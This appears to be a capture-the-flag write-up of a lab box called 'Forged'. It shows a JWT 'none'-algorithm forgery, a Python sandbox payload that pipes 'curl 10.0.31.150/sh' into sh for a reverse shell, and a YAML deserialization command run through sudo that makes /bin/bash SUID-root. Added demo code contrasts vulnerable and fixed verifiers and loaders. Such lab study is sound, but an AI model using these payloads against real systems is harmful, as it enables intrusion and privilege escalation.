Forged Writeup


Port Scanning

nmap -sV -sC -p- -v $IP --open

forged

Enumeration

http://172.16.8.48

forged 1
forged 2

After registering an account, we can see that the application has a New Project feature. However, our user does not have the privilege to access it.

forged 3
forged 4

Looking at the session cookies, we can see it uses a JWT.

forged 5

https://jwt.io/

forged 6

With this, we can test some JWT-related attacks.

JWT Hunter

Using the JWT Hunter tool, we can see the token is vulnerable to the "none" algorithm attack: the server trusts the alg value in the token header, so a token with alg set to none and an empty signature is accepted without any signature check.

https://jwthunter.io/

forged 7

After copying the forged token and pasting it into the session cookie in place of the original one, we gain access to the feature.

forged 8
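
The forgery above, reproduced as an added example (this is not code from the original writeup, and the application's real secret and claim names are unknown): a token is minted the way the app would, rewritten with alg set to none and an empty signature, and then checked against a verifier that trusts the header's alg and against one that pins the algorithm server-side. The secret, the user and role claims, and both verifiers are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed for the demo; the real application's signing key is unknown.
SECRET = b"constructed-demo-secret"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def issue_hs256(claims: dict, secret: bytes) -> str:
    """Mint a normal HS256 token, standing in for the session cookie the app hands out."""
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(claims)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def forge_none(token: str, overrides: dict) -> str:
    """Rewrite a token with alg=none, changed claims and an empty signature segment."""
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(_unb64url(header_b64))
    payload = json.loads(_unb64url(payload_b64))
    header["alg"] = "none"
    payload.update(overrides)
    return f"{_segment(header)}.{_segment(payload)}."


def verify_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """Trusts the alg from the token header: 'none' means no signature check at all."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_unb64url(header_b64))
    payload = json.loads(_unb64url(payload_b64))
    alg = header.get("alg")
    if alg == "none":
        return payload
    if alg == "HS256":
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, _unb64url(sig_b64)):
            return payload
    return None


def verify_fixed(token: str, secret: bytes) -> Optional[dict]:
    """Pins the algorithm server-side; anything other than HS256 is rejected outright."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_unb64url(header_b64))
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64url(sig_b64)):
        return None
    return json.loads(_unb64url(payload_b64))


if __name__ == "__main__":
    # "user"/"role" claims are assumed for the demo; the real token's claims are not shown.
    legit = issue_hs256({"user": "lowpriv", "role": "user"}, SECRET)
    forged = forge_none(legit, {"role": "admin"})
    print("forged token:       ", forged)
    print("vulnerable verifier:", verify_vulnerable(forged, SECRET))
    print("fixed verifier:     ", verify_fixed(forged, SECRET))
```

The fix is the second verifier: the accepted algorithm is a server-side constant, so the header's alg can never downgrade the check. Most JWT libraries expose this as an explicit allow-list of algorithms passed at verification time.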

Foothold

The New Project feature is a Python sandbox. We gain initial access by submitting the following payload, which reaches the os module through __import__ and pipes a reverse shell script from our host into sh:

evil.py

__import__('os').popen("curl 10.0.31.150/sh | sh").read()
forged 9

Note: I used the payload from https://reverse-shell.sh/yourip:1337

python3 -m http.server 80
forged 10
nc -lnvp 1337
forged 11

Privilege Escalation

sudo -l
forged 12

We can run the slo-generator binary as root without a password.

After some research, we found there is a known exploit for it.

https://www.exploit-db.com/exploits/50385

forged 13

To exploit it, run the following commands. The YAML file carries a Python object tag that the loader turns into an os.system call, which runs as root and sets the SUID bit on /bin/bash; bash -p then starts a shell that keeps the effective root UID:

echo '!!python/object/apply:os.system ["chmod u+s /bin/bash"]' > exploit.yaml
sudo /usr/local/bin/slo-generator migrate -b exploit.yaml
bash -p
forged 14
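
Why the exploit.yaml above works, as an added example that is not part of the original writeup and not slo-generator's or PyYAML's code: a stdlib-only model of what an unsafe YAML loader does with the python/object/apply tag (resolve the dotted name to a callable by importing its module, then call it with the sequence as arguments) next to the refusal a safe loader gives. The regex mini-parser for a single tagged flow sequence is constructed for the demo and is not a YAML parser; the benign os.path.basename call stands in for the page's os.system so the block runs harmlessly.

```python
import importlib
import re
from typing import Any, Callable, List, Tuple

# PyYAML expands the "!!" shorthand to the tag:yaml.org,2002: namespace; the
# page's exploit uses the python/object/apply tag, which unsafe loaders
# turn into "import the named callable and call it with these arguments".
APPLY_TAG = "!!python/object/apply:"

# Constructed mini-grammar: one tagged flow sequence of double-quoted strings,
# e.g.  !!python/object/apply:os.system ["chmod u+s /bin/bash"]
_TAGGED_SEQ = re.compile(r'^(!!\S+)\s+\[(.*)\]\s*$')


def parse_tagged_line(line: str) -> Tuple[str, List[str]]:
    """Return (tag, args) for one tagged flow sequence, or raise ValueError."""
    m = _TAGGED_SEQ.match(line.strip())
    if not m:
        raise ValueError('expected \'!!tag ["arg", ...]\'')
    return m.group(1), re.findall(r'"([^"]*)"', m.group(2))


def resolve_python_name(dotted: str) -> Callable:
    """'os.path.basename' -> the os.path.basename function (import + getattr)."""
    module_name, _, attr = dotted.rpartition(".")
    if not module_name:
        raise ValueError("need a module.attr name")
    return getattr(importlib.import_module(module_name), attr)


def unsafe_construct(line: str) -> Any:
    """Model of an unsafe loader: resolves the callable named in the tag and calls it."""
    tag, args = parse_tagged_line(line)
    if not tag.startswith(APPLY_TAG):
        raise ValueError(f"unsupported tag {tag}")
    func = resolve_python_name(tag[len(APPLY_TAG):])
    return func(*args)  # with os.system as func this is the root code execution


def safe_construct(line: str) -> List[str]:
    """Model of yaml.safe_load: language-specific tags are rejected, never executed."""
    tag, args = parse_tagged_line(line)
    if tag.startswith("!!python/"):
        raise ValueError(f"refusing to construct {tag}")
    return args


def exploit_yaml(command: str) -> str:
    """Build the one-line document the writeup feeds to `slo-generator migrate -b`."""
    return f'{APPLY_TAG}os.system ["{command}"]'


if __name__ == "__main__":
    benign = f'{APPLY_TAG}os.path.basename ["/etc/passwd"]'
    print("unsafe loader:", unsafe_construct(benign))  # calls os.path.basename("/etc/passwd")
    print("page's document:", exploit_yaml("chmod u+s /bin/bash"))  # same path, os.system as the callable
    try:
        safe_construct(benign)
    except ValueError as err:
        print("safe loader:", err)
```

The mitigation on the application side is to parse untrusted documents with yaml.safe_load (or an explicit SafeLoader) instead of yaml.load with a loader that honours Python object tags; on the host side, a sudo rule that lets a low-privileged user pass an arbitrary file to a YAML-consuming tool as root is the privilege boundary that actually failed here.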

Proof

forged 15